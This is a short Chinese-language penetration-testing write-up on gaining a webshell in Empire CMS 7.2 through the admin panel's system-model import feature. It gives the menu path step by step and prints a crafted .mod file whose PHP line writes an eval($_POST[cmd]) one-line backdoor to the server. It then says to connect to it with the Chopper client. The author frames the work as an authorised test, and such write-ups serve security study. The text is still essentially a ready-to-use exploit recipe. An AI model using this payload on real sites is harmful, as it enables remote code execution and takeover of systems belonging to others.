帝国cms 7.2 后台 GetShell

0x01

        今天帮测一个授权站点，拿到了后台登陆信息，进入后台准备拿WebShell。

0x02

        1.进入后台

        2.系统设置——数据表与系统模型——管理数据表——管理系统模型——导入系统模型

        3.在本地新建1.php.mod文件,利用fopen函数写出一个bearcat.php文件，文件内容为fopen函数第二个参数值)，然后保存。

<?fputs(fopen("bearcat.php","w"),"<?eval(\$_POST[cmd]);?>")?>

        4.导入模型

        5.访问http://www.xxx.com/e/admin/bearcat.php 菜刀连接。